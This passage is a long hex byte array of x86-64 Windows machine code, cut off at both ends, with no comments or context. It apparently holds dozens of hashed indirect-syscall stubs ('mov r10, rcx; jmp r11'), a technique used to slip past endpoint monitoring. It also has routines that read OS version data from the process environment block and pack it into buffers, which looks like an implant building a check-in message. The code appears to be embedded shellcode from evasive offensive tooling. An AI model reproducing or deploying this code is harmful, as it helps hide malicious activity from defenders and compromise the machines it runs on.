x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x8A,0xF2,0x3D,0xE6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x4B,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE0,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x3A,0x3D,0xA8,0x32,0x51,0x48,0x83,0xEC,0x28,0xE8,0xF4,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x89,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x5C,0x59,0xF3,0x6A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x9D,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x32,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x6E,0x23,0x30,0xE8,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x43,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD8,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0x55,0x3F,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0xEC,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x81,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x04,0x0E,0xDA,0x6B,0x51,0x48,0x83,0xEC,0x28,0xE8,0x95,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x2A,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x10,0xDE,0xB1,0x12,0x51,0x48,0x83,0xEC,0x28,0xE8,0x3E,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD3,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x20,0x35,0x89,0x10,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE7,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x7C,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xB5,0x3A,0x1B,0x38,0x51,0x48,0x83,0xEC,0x28,0xE8,0x90,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x25,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x9C,0xD0,0xC6,0x20,0x51,0x48,0x83,0xEC,0x28,0xE8,0x39,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xCE,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x3C,0xF4,0x9E,0xBA,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xDF,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x74,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x44,0x8D,0x66,0xCB,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x85,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x1A,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x8F,0x59,0x39,0x13,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2E,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xC3,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xBA,0x75,0xEB,0xB6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD4,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x69,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xEF,0xD9,0xB0,0x1B,0x51,0x48,0x83,0xEC,0x28,0xE8,0x7D,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x12,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE7,0x84,0xCD,0x0A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x26,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBB,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x37,0x04,0x96,0x36,0x51,0x48,0x83,0xEC,0x28,0xE8,0xCF,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x64,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x79,0x5C,0x2D,0x7A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x78,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x0D,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x8F,0xCC,0x1A,0xCA,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x1E,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xB3,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x19,0xD6,0x26,0x0C,0x51,0x48,0x83,0xEC,0x28,0xE8,0xC7,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x5C,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x89,0xC2,0x8B,0x45,0x18,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0xF8,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x56,0x3B,0x00,0x00,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0x8B,0x45,0x10,0x8B,0x50,0x10,0x8B,0x45,0x20,0x01,0xD0,0x89,0x45,0xFC,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x39,0x45,0xFC,0x73,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x47,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x18,0x48,0x39,0xC2,0x72,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x30,0x48,0x8B,0x45,0x10,0x8B,0x50,0x10,0x44,0x8B,0x45,0x20,0x48,0x8B,0x4D,0x18,0x48,0x8B,0x45,0x10,0x45,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x49,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x55,0xFC,0x89,0x50,0x10,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0x8B,0x45,0x10,0x8B,0x40,0x20,0x89,0x45,0xD0,0x48,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x24,0x66,0x89,0x45,0xD4,0x48,0x8B,0x45,0x10,0x0F,0xB7,0x40,0x26,0x66,0x89,0x45,0xD6,0xC7,0x45,0xD8,0x03,0x00,0x00,0x00,0xC7,0x45,0xDC,0x20,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xD4,0x66,0x89,0x02,0x83,0x45,0xFC,0x02,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xD6,0x66,0x89,0x02,0x83,0x45,0xFC,0x02,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xD8,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xB0,0x48,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x20,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x31,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0xD3,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x03,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x43,0x04,0x89,0x02,0x83,0x45,0xFC,0x04,0x8B,0x45,0xFC,0x48,0x8D,0x55,0xF0,0x48,0x01,0xC2,0x8B,0x43,0x08,0x89,0x02,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x0C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA9,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x07,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF4,0x48,0x89,0x45,0xC0,0x8B,0x45,0xFC,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x29,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9F,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x04,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x89,0x45,0xC0,0x8B,0x45,0xF0,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xD9,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x52,0x48,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x09,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xDC,0x48,0x89,0x45,0xC0,0x8B,0x45,0xE4,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x8C,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xE0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x90,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0xC7,0x45,0xC8,0x60,0x00,0x00,0x00,0x8B,0x45,0xC8,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF8,0x48,0x05,0x1C,0x01,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x20,0x01,0x00,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xF8,0x48,0x05,0x24,0x01,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xF8,0x48,0x05,0xE8,0x02,0x00,0x00,0x48,0x89,0x45,0xD0,0x66,0xC7,0x45,0x90,0x09,0x00,0x66,0xC7,0x45,0x92,0x00,0x00,0x66,0xC7,0x45,0x94,0x00,0x00,0xC6,0x45,0x96,0x00,0xC6,0x45,0x97,0x01,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x89,0x45,0x98,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x89,0x45,0x9C,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x45,0xA0,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x89,0x45,0xA4,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xAC,0x00,0x00,0x66,0xC7,0x45,0xAE,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x50,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x58,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x90,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x92,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0x94,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB6,0x45,0x96,0x88,0x02,0x83,0x45,0xCC,0x01,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB6,0x45,0x97,0x88,0x02,0x83,0x45,0xCC,0x01,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0x98,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0x9C,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA0,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA4,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x45,0xCC,0x04,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xAC,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x0F,0xB7,0x45,0xAE,0x66,0x89,0x02,0x83,0x45,0xCC,0x02,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x48,0x8B,0x45,0xB0,0x48,0x89,0x02,0x83,0x45,0xCC,0x08,0x8B,0x45,0xCC,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x01,0xC2,0x48,0x8B,0x45,0xB8,0x48,0x89,0x02,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0x8B,0x4D,0x8C,0x48,0x8D,0x95,0x50,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF7,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0